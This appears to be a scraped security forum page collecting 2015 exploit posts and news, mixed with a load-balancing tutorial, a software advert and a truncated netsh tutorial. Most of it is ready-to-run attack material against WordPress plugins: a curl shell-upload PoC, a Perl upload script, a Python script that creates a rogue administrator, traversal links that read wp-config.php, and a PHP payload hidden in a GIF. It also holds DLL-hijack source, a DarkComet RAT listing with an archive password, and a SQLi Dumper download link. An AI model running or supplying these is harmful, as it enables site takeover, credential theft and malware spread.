Search the Community

###################### # Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability # Exploit Author : Claudio Viviani # Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip # Date : 2015-03-14 # Tested on : Linux BackBox 4.0 / curl 7.35.0 ###################### # Description: Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts. Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving. This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow. ###################### # Location : http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php ###################### # PoC: curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php # Backdoor Location: http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php ###################### # Vulnerability Disclosure Timeline: 2015-03-14: Discovered vulnerability 2015-04-03: Vendor Notification 2015-04-03: Vendor Response/Feedback 2015-04-04: Vendor Fix/Patch (2.5.3) 2014-04-04: Public Disclosure ##################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog http://ffhd.homelab.it (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpworktheflow252-shell.txt

File Name: aty.exe = DarkComet MD5: f766539495d37106b4e090ef0e6a5a86 Date/Time: 1-04-15,07:53:51 File Size: 280134 Bytes Reported by Most-Security.com Status: infected Detection: 2/35 AVG Free File Clean! Avast File Clean! AntiVir (Avira)TR\/Dropper.Gen BitDefender File Clean! Clam Antivirus File Clean! COMODO Internet Security File Clean! Dr.Web File Clean! eTrust-Vet File Clean! F-PROT Antivirus File Clean! F-Secure Internet Security File Clean! G Data File Clean! IKARUS Security File Clean! Kaspersky Antivirus File Clean! McAfee File Clean! MS Security Essentials File Clean! ESET NOD32 File Clean! Norman File Clean! Norton Antivirus File Clean! Panda Security File Clean! A-Squared File Clean! Quick Heal Antivirus File Clean! Solo Antivirus File Clean! SophosMal\/VBDrop-G Trend Micro Internet Security File Clean! VBA32 Antivirus File Clean! Zoner AntiVirus File Clean! Ad-Aware File Clean! BullGuard File Clean! FortiClient File Clean! K7 Ultimate File Clean! NANO Antivirus File Clean! Panda CommandLine File Clean! SUPERAntiSpyware File Clean! Twister Antivirus File Clean! VIPRE File Clean! Download: sters - virus Password rar: eazye

###################################################################### # Exploit Title: Wordpress PHP Event Calendar Plugin - Arbitrary File Upload # Google Dork: inurl:/plugins/php-event-calendar/ # Date: 02.04.2015 # Exploit Author: CrashBandicot (@DosPerl) # Source Plugin: https://wordpress.org/plugins/php-event-calendar/ # Vendor HomePage: http://phpeventcalendar.com/ # Version: 1.5 # Tested on: MSwin ###################################################################### # Path of File : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php # Vulnerable File : uploadify.php <?php /* Uploadify Copyright (c) 2012 Reactive Apps, Ronnie Garcia Released under the MIT License <http://www.opensource.org/licenses/mit-license.php> */ // Define a destination //$targetFolder = '/uploads'; // Relative to the root $targetFolder = $_POST['targetFolder']; // wp upload directory $dir = str_replace('\\','/',dirname(__FILE__)); //$verifyToken = md5('unique_salt' . $_POST['timestamp']); if (!empty($_FILES)) { $tempFile = $_FILES['Filedata']['tmp_name']; //$targetPath = $dir.$targetFolder; $targetPath = $targetFolder; $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name']; $targetFile = rtrim($targetPath,'/') . '/' . $fileName; // Validate the file type $fileTypes = array('jpg','jpeg','gif','png'); // File extensions $fileParts = pathinfo($_FILES['Filedata']['name']); if (in_array($fileParts['extension'],$fileTypes)) { move_uploaded_file($tempFile,$targetFile); echo '1'; } else { echo 'Invalid file type.'; } } ?> # Exploit #!/usr/bin/perl use LWP::UserAgent; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "\t +===================================================\n"; print "\t | PHP event Calendar Plugin - Arbitrary File Upload \n"; print "\t | Author: CrashBandicot\n"; print "\t +===================================================\n\n"; die "usage : perl $0 backdoor.php.gif" unless $ARGV[0]; $file = $ARGV[0]; my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},); my $ch = $ua->post("http://127.0.0.1/wp-content/plugins/php-event-calendar/server/classes/uploadify.php", Content_Type => 'form-data', Content => [ 'Filedata' => [$file] , targetFolder => '../../../../../' , user_id => '0day' ])->content; if($ch = ~/1/) { print "\n [+] File Uploaded !"; } else { print "\n [-] Target not Vuln"; } __END__ # Path Shell : http://localhost/0day_backdoor.php.gif Source

#Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File Upload #Product: Wordpress plugin Simple Ads Manager #Vendor: https://profiles.wordpress.org/minimus/ #Affected version: Simple Ads Manager 2.5.94 #Download link: https://wordpress.org/plugins/simple-ads-manager/ #CVE ID: CVE-2015-2825 #Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team :: PROOF OF CONCEPT :: + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: targer.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------108989518220095255551617421026 Content-Length: 683 -----------------------------108989518220095255551617421026 Content-Disposition: form-data; name="uploadfile"; filename="info.php" Content-Type: application/x-php <?php phpinfo(); ?> -----------------------------108989518220095255551617421026 Content-Disposition: form-data; name="action" upload_ad_image -----------------------------108989518220095255551617421026- + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Vulnerable code: from line 303 to 314 case 'sam_ajax_upload_ad_image': if(isset($_POST['path'])) { $uploadDir = $_POST['path']; $file = $uploadDir . basename($_FILES['uploadfile']['name']); if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file )) { $out = array('status' => "success"); } else { $out = array('status' => "error"); } } break; + REFERENCE: - ITAS Vietnam | ITAS Corp s-in-Hakin9-IT-Security-Magazine-78.html?language=en - Best regard -------------------- ITAS Team (ITAS Vietnam | ITAS Corp) Source: http://packetstorm.wowhacker.com/1504-exploits/wpsam-upload.txt

#[+] Author: TUNISIAN CYBER #[+] Exploit Title: UltraISO v9.6.2.3059 DLL Hijacking #[+] Date: 28-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Poc:http://i.imgur.com/naHAdJF.png #[+] Create Compile the file then rename it to daemon.dll then create .iso file , make sure that # the 2 files are in the same dir. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } Source

Exploit Title : Wordpress Aaspose-pdf-exporter Plugin File Download Vulnerability Exploit Author : Ashiyane Digital Security Team Vendor Homepage: https://wordpress.org/plugins/aspose-pdf-exporter/ Download Link : https://downloads.wordpress.org/plugin/aspose-pdf-exporter.zip Date : 28 / 3 / 2015 Tested On : windows 8.1 + linux Kali ######################################### ######################################### ~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> Exploit: | | [+] Vulnerable file : 404 Not Found ~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> 404 Not Found[File Address] Examples : 404 Not Found ######################################### ######################################### Discovered by : Rq07 ######################################### Source: http://dl.packetstormsecurity.net/1503-exploits/wpaspose-disclose.txt

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title: Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/ | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip | [+] Tested on: Windows,Linux | | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : 404 Not Found | | [+] Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> | [+] 404 Not Found[File Address] | [+] | [+] Examples : 404 Not Found |-------------------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||* Source: http://dl.packetstormsecurity.net/1503-exploits/wpasposede-disclose.txt Edit: Cer ca postul acesta s? fie ?ters dac? se poate , originally posted by Aerosol : https://rstforums.com/forum/99636-wordpress-aspose-doc-exporter-plugin-1-0-arbitrary-file-download-vulnerability.rst

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title:Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/ | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip | [+] Tested on: Windows,Linux | | [+] Date : 2015-03-28 | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php | | [+] Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> | [+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address] | [+] | [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php |-------------------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||* Source

#[+] Author: TUNISIAN CYBER #[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking #[+] Date: 28-03-2015 #[+] Type: Local Exploits #[+] Vendor: https://httrack.com/page/2/fr/index.html #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Create Compile the file then rename it to dwmapi.dll then create .whtt file , make sure that # the 2 files are in the same dir. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } Source

ANTLabs today is expected to roll out patches for a vulnerability in its InnGate Internet gateways that are popular in hospitality and convention locations. The gateways provide temporary Internet access to hotel guests or conference attendees using kiosks, for example. The vulnerability (CVE-2015-0932), discovered by security company Cylance, gives an attacker remote read and write access to the device’s file system. “Remote access is obtained through an unauthenticated rsync daemon running on TCP 873. Once the attacker has connected to the rsync daemon, they are then able to read and write to the file system of the Linux based operating system without restriction,” wrote researcher Brian Wallace in an advisory published today. Full read and write access can be leveraged for remote code execution and enable a hacker to backdoor the device or add an executable or a new authenticated root-level user, Cylance said. “Once full file system access is obtained, the endpoint is at the mercy of the attacker,” Wallace wrote. The exposed rsync command is trivial to abuse, Wallace said, using a few commonly known Linux or UNIX commands to find available rsync shares and list files in the root. There are also rsync commands for uploading and downloading files. Rsync is a utility on Linux and UNIX machines that is used for file synchronization and file transfers either locally or between remote computers. While the risk with such a vulnerability is generally limited to crimes such as fraud and identity theft, a research report last November from Kaspersky Lab on the DarkHotel APT group shows that targeted attacks against business hotel Wi-Fi networks is not out of the question. DarkHotel operates in Asia primarily compromising said Wi-Fi networks, infecting users as they connect with a phony software update such as Adobe Flash, which instead pushed a digitally signed piece of malware that includes a keylogger and other data-stealing capabilities that is sent via a backdoor to the attackers. The DarkHotel campaign also was able to access other systems on hotel networks such as machines running registration information. This capability allowed the APT group to infect only specific guests with the phony update installer. Cylance said its vulnerability is severe and requires little sophistication to exploit. “An attacker exploiting the vulnerability in CVE-2015-0932 would have the access to launch DarkHotel-esque attacks against guests on the affected hotel’s WiFi. Targets could be infected with malware using any method from modifying files being downloaded by the victim or by directly launching attacks against the now accessible systems,” Wallace said. “Given the level of access that this vulnerability offers to attackers, there is seemingly no limit to what they could do.” Cylance said it scanned the Internet’s IPv4 space for the ANTLabs devices and found 277 that could be compromised from the Internet, most of those in North America, but some in Asia, the Middle East and Europe. In addition to applying the patch upon its release, Cylance said locations running the vulnerable devices could block unauthenticated rsync processes via a TCP-DENY command on port 873. Source

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title:Wordpress Aspose-Cloud-eBook-Generator Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-cloud-ebook-generator/ | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-cloud-ebook-generator.zip | [+] Tested on: Windows,Linux | | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php | | [+] Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> | [+] http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=[File Address] | [+] | [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php |-------------------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||* Source

Berta CMS is a web based content management system using PHP and local file storage. http://www.berta.me/ Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought to our attention we checked the file upload functionality of this software. We found that the file upload didn't require authentication. Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions. It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions. http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ <http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/> We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues. The author was notified: 2015-03-22 Author Acknowledge: 2015-03-23 Patch released: 2015-03-26 The berta-0.8.10b.zip file from: http://www.berta.me/download/ includes a fix that requires authentication to upload files. This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails). The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers. POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1 Host: 192.168.56.101 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.56.101/upload.html Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802 Content-Length: 1617 -----------------------------2147563051636691175750543802 Content-Disposition: form-data; name="Filedata"; filename="c.php" Content-Type: text/php GIF89/* < ³ ÿÿÿfffÌÌÌ333Ìÿÿ™™™3ffÌÌÿÌÿÌ™™Ìf3f 33 f™™3 3 3!þ GIF SmartSaver Ver1.1a , È < þ ÈI«½8ëÍ»ÿ`(Ždižhª®lë¾p,Ïtmßx®ï|ïÿÀ p¸ Ȥr™$ö˜ 4ê¬Z¯Õ cËíz¿`n { „ 2-xLn»ßé³|Î`« ¼^O6‡ãkp‚ƒ„#jtˆ]v)~`}g€_‹…”••‡‰‰“' _ 1˜Š–¤¥‚¢™s›& ^ŸŽ¡a«¦´µ?¨©g³$*]¯ž± ¶ÃÄ<¸¹Âw X½\‘^»ÅÒÓ+ÇÈÐ,Í[Ô%ÇÑÜàá)ÖßÙËâ Þèëì'äeç MÌJ êíøùöº x{{ üý P€‚64 ðVpÃ@> 8PƒÄ3 R±pOŸÇ þ ÞU8˜!@˜ (SbL9 a “š6Z8·° É 03 )¡#ÈŸøD Œ÷òäµI ¬ qY RN›D $½Æ€§O XÅ p §Qd‹ P*s c˜® &’y5«Ûi[ÓF ð´‹R~ ÄŽ%Û4 Z {· Ðö*a[q¥Î•P—Ë]Yy o™„mc/*ål,|¸3©Ä )\fðX˜d.L+Ç“Ã Àh¾ 8{žM ôb×'‡‚**GãEŒ Tï>غgnãÉh+/d{·…у¹FU;ñ9ë ‰Xv} A/¬Ø —‹ Ôü»u0Ñå:g Ãëôªxv-À’嬮²Çë'R ˜Wôº™þ' f XCÅuýÜÆ ~áíç ý¹âÞqê xÐ7Þ}ÑP{ ®ç Ö„Ôàƒ$ ¡/ (Ýz zQÜLááÕ¡€ ý6‡ˆÉ•¨c ':“â é)¶ w Ý <*H£A5å‚£$;FÉ£ŒJúw Z žŠ -ƒ$ ¡Iõ "Ob#å™8ô¸Í ˜e)a™vu@ä— „6f"pŠ æž5¨‰Ð XVù&r v 3jy'ž„šÉç£/øY …B h¤œ^ž f<‹’FP‹(n %¤¤² )›q *{\j0§¦už *f;©ê£¨Ž–ª« § Ú¦*kÒ¥`ž‚ k¢oZÓ ²¡þæ·ë³ ôzå¯ j9ë /º9*/<?php phpinfo(); ?>/* `ÇŽ´Ìµ°U .±áBkî>#VëE’ ¦ªîª• Šj v«* £í ¹åœë/®¹¾‹ Æ;h»6 D ·`°k0ŠÇ H¡³ÿú› ÃòN n Äñf/¹¤a÷±ÀkFÜ ‡ WlîÅÊÊ4f c¶Q s´6 ¢ˆz Ê1/RǯÊ@Wpñ ™É ³&¸ *Ç]Aæ|ñ n± O ôÕ o+îi! † ¥!"“ÓÀ"4õ ¥—2Ö¤^ óX0wʆZ™´F6É rÝuÖV³*²Û Ò óÔzâ Hqw?|kà‚ÿìwÅnóýUÆ’k*øá‡e |ùŸ•£7šã [L%G‚ãA©á}‹–Ku™7¼éza q- k‡Žf䬆·¯¯£ŽÔé² $nç Àk vº¶'o D(åá°< éQ€ `£` q}FÙ*ïý÷à‡/þøä—oþù觯þúì·ïþûðÇ/ÿüô×oÿýøç¯ÿþü÷ïÿÿ ; -----------------------------2147563051636691175750543802 Content-Disposition: form-data; name="submit" Upload Image -----------------------------2147563051636691175750543802-- Simon Waters phone +448454681066 email simon.waters@surevine.com skype simon.waters.surevine Participate | Collaborate | Innovate Surevine Limited Source

Product Description Easy Backup Software for Laptops and PCs A reliable and easy-to-use backup software for home users to back up photos, music, videos, documents, emails, etc. Affordable yet Powerful – fast, safe and easy, only 50% of the price of competitors. Easy to Install and Simple to Use – intuitive interface guiding you step-by-step. Recommended by many famous websites – wins a lot of awards from PC World, Cnet, Softpedia, ToptenREVIEWS, etc. Reliable and Secure – back up any crucial data and protect them in a safe way. It is an advanced and reliable data backup & system disaster recovery software for home desktops and laptops. It enables users to perform backup operation oriented on complete system & file backup to fully protect important data with comprehensive differential/incremental backup and fast system snapshot. Backup Features Backup system – one-click system backup. Back up entire system state (operation system and installed applications) on-the-fly without interrupting Windows work. Backup all files – network shared files, specified files & folders and different kinds of file types can be full or selectively backed up. Outlook backup and restore – backs up of all your email messages in Outlook and save them in a safe way, so you always can access them, especially when you accidentally delete emails. Backup certain file type in specified folder – allows you to specify one file type to backup in certain folder, avoiding monotonous and boring manual efforts. Add Network-attached storage – just one time to add Network – attached Storage (NAS) as the destination, and enjoy the convenience of easy backup process forever. New! Backup data including contacts, messages, call logs, documents, music, photos, videos in Android device. Recovery Benefit Specified file recovery – Directly recover individual files from disk/partition backup image, no need to recover the whole image for saving much disk space and time. System migration – fast, easy and safely migrate system to a SSD without reinstalling windows. System Snapshot – take a snapshot of the current system for fast system recovery from crashed/failed system. Disk & partition recovery – fast recover the whole hard disk, partition, dynamic volume or GPT disk to original or different hardware to upgrade & migrate hard disk. New! Recover data including contacts, messages, call logs, documents, music, photos, videos in Android device. Special Benefits Copy to cloud for double protection of data. Clone disk for hard drive upgrade (GPT disk included). Explore backup image file in Windows Explorer. Automatically delete old images to save disk space. -> Download <-Deal Expire in:

#!/usr/bin/python # # Exploit Name: WP Marketplace 2.4.0 Remote Command Execution # # Vulnerability discovered by Kacper Szurek (http://security.szurek.pl) # # Exploit written by Claudio Viviani # # # # -------------------------------------------------------------------- # # The vulnerable function is located on "wpmarketplace/libs/cart.php" file: # # function ajaxinit(){ # if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){ # if(function_exists($_POST['execute'])) # call_user_func($_POST['execute'],$_POST); # else # echo __("function not defined!","wpmarketplace"); # die(); # } #} # # Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook). # wpmp_pp_ajax_call() call functions by call_user_func() through POST data: # # if (function_exists($_POST['execute'])) # call_user_func($_POST['execute'], $_POST); # else # ... # ... # ... # # $_POST data needs to be an array # # # The wordpress function wp_insert_user is perfect: # # http://codex.wordpress.org/Function_Reference/wp_insert_user # # Description # # Insert a user into the database. # # Usage # # <?php wp_insert_user( $userdata ); ?> # # Parameters # # $userdata # (mixed) (required) An array of user data, stdClass or WP_User object. # Default: None # # # # Evil POST Data (Add new Wordpress Administrator): # # action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator # # --------------------------------------------------------------------- # # Dork google: index of "wpmarketplace" # # Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6 # # Http connection import urllib, urllib2, socket # import sys # String manipulator import string, random # Args management import optparse # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url # Check if file exists and has readable def checkfile(file): if not os.path.isfile(file) and not os.access(file, os.R_OK): print '[X] '+file+' file is missing or not readable' sys.exit(1) else: return file def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) banner = """ ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' ___ ___ __ __ __ | Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----. |. | _ | _| <| -__| _| _ | | _ | __| -__| |. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____| |: | | |__| |::.|:. | `--- ---' WP Marketplace R3m0t3 C0d3 Ex3cut10n (Add WP Admin) v2.4.0 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) commandList.add_option('--timeout', action="store", default=10, type="int", help="[Timeout Value] - Default 10", ) options, remainder = commandList.parse_args() # Check args if not options.target: print(banner) commandList.print_help() sys.exit(1) host = checkurl(options.target) timeout = options.timeout print(banner) socket.setdefaulttimeout(timeout) username = id_generator() pwd = id_generator() body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call', 'execute' : 'wp_insert_user', 'user_login' : username, 'user_pass' : pwd, 'role' : 'administrator'}) headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'} print "[+] Tryng to connect to: "+host try: req = urllib2.Request(host+"/", body, headers) response = urllib2.urlopen(req) html = response.read() if html == "": print("[!] Account Added") print("[!] Location: "+host+"/wp-login.php") print("[!] Username: "+username) print("[!] Password: "+pwd) else: print("[X] Exploitation Failed :(") except urllib2.HTTPError as e: print("[X] "+str(e)) except urllib2.URLError as e: print("[X] Connection Error: "+str(e)) Source

A security researcher says there is a bug in the Instagram API that could enable an attacker to post a message with a link to a page he controls that hosts a malicious file, but when the user downloads the file it will appear to come from a legitimate Instagram domain, leading the victim to trust the source. The issue, a reflected filename download bug, lies in the public API for the Instagram service, which is owned by Facebook. Researcher David Sopas of WebSegura in Portugal found that by using the access token from any user’s account, pasting some code into the bio field in a user’s account and using some other little tricks, he could produce a file download link that seems to be hosted on a legitimate Instagram domain. “This time I found a RFD on Instagram API. No need to add any command on the URL because we will use a persistent reflected field to do that. Like “Bio” field on the user account. What we need? A token. No worries we just need to register a new user to get one,” Sopas wrote in a post explaining the bug and exploitation technique. “Next step: Insert the batch command we want to use in the user account Bio field [and maybe others]. I’ll try to open a Chrome new window with a malicious page disabling most the protections from this browser.” Sopas found that the technique works on Chrome, Opera, Chrome for Android, the Android stock browser and Firefox in some circumstances. In order to make it work, he also constructed a specific filename, and when a victim clicks on a link in the attacker’s Instagram message, she will be taken to an attacker-controlled page with a file that appears to be on an Instagram domain. The video above demonstrates the technique. The attacker could host any malicious file he chooses at the target location, including malware. Sopas said he has been unable to convince Facebook security engineers that RFD issues are security vulnerabilities. He said they told him the issue was not a priority. “Many companies still don’t understand that RFD is very dangerous and combined with other attacks like phishing or spam it could lead to massive damage,” Sopas said via email. “[imagine] a phishing campaign where the link of the email is really from Instagram?” Source

For today we will try to load balance 2 Debian servers. This tool can be used for servers like Web, Application, Gateway and so on. Toold used for this is named UCARP and is very good for high-availability servers. To be able to use it we must install it for both servers named in this example WS1 and WS2 using command: ~# apt-get install ucarp -y Reading package lists... Done Building dependency tree Reading state information... Done The following extra packages will be installed: libpcap0.8 The following NEW packages will be installed: libpcap0.8 ucarp 0 upgraded, 2 newly installed, 0 to remove and 0 not upgraded. Need to get 165 kB of archives. After this operation, 504 kB of additional disk space will be used. After installing we should edit /etc/network/interfaces file on both servers. For WS1 the config file will look like the next one: auto eth0 iface eth0 inet static address 192.168.69.10 netmask 255.255.255.0 network 192.168.69.0 broadcast 192.168.1.255 gateway 192.168.69.1 ucarp-vid 2 ucarp-vip 192.168.69.2 ucarp-password Hackyard ucarp-advskew 10 ucarp-advbase 1 ucarp-master yes auto eth0:ucarp iface eth0:ucarp inet static address 192.168.69.12 netmask 255.255.255.255 For WS2 the config file will look like the next one: auto eth0 iface eth0 inet static address 192.168.69.11 netmask 255.255.255.0 network 192.168.69.0 broadcast 192.168.1.255 gateway 192.168.69.1 ucarp-vid 2 ucarp-vip 192.168.69.2 ucarp-password Hackyard ucarp-advskew 20 ucarp-advbase 1 ucarp-master no auto eth0:ucarp iface eth0:ucarp inet static address 192.168.69.12 netmask 255.255.255.255 After done editing both interfaces config file we will restart interfaces using command: # /etc/init.d/networking restart Now load-balancing server is done. Author: razvan1@hy

SQLi Dumper v.7 - Tool to find bugs errors or vulnerabilities in MySQL database Functions SQL Injection Operation System Function Dump Database Extract Database Schema Search Columns Name Read File (read only) Create File (read only) Brute Table & Column http://www.4shared.com/rar/7grTslfQce/SQLi_Dumper_v71.html

BlueScreenView scans all your minidump files created during 'blue screen of death' crashes, and displays the information about all crashes in one table. For each crash, BlueScreenView displays the minidump filename, the date/time of the crash, the basic crash information displayed in the blue screen (Bug Check Code and 4 parameters), and the details of the driver or module that possibly caused the crash (filename, product name, file description, and file version). Features Automatically scans your current minidump folder and displays the list of all crash dumps, including crash dump date/time and crash details. Allows you to view a blue screen which is very similar to the one that Windows displayed during the crash. BlueScreenView enumerates the memory addresses inside the stack of the crash, and find all drivers/modules that might be involved in the crash. BlueScreenView also allows you to work with another instance of Windows, simply by choosing the right minidump folder (In Advanced Options). BlueScreenView automatically locate the drivers appeared in the crash dump, and extract their version resource information, including product name, file version, company, and file description. For those who use Windows at a daily basis I suggest to take a closer look at the NirSoft Suite. Useful for many things, including security. Source: HERE

Have you ever been on a pentest, or troubleshooting a customer issue, and the "next step" was to capture packets on a Windows host? Then you find that installing winpcap or wireshark was simply out of scope or otherwise not allowed on that SQL, Exchange, Oracle or other host? It used to be that this is when we'd recommend installing Microsoft's Netmon packet capture utility, but even then lots of IT managers would hesitate about using the "install" word in association with a critical server. Well, as they say in networking (and security as well), there's always another way, and this is that way. "netsh trace" is your friend. And yes, it does exactly what it sounds like it does. Type "netsh trace help" on any Windows 7 Windows Server 2008 or newer box, and you'll see the following: C:\>netsh trace help The following commands are available: Commands in this context: ? - Displays a list of commands. convert - Converts a trace file to an HTML report. correlate - Normalizes or filters a trace file to a new output file. diagnose - Start a diagnose session. dump - Displays a configuration script. help - Displays a list of commands. show - List interfaces, providers and tracing state. start - Starts tracing. stop - Stops tracing. Of course, in most cases, tracing everything on any production box is not advisable - especially if it's your main Exchange, SQL or Oracle server. We'll need to filter the 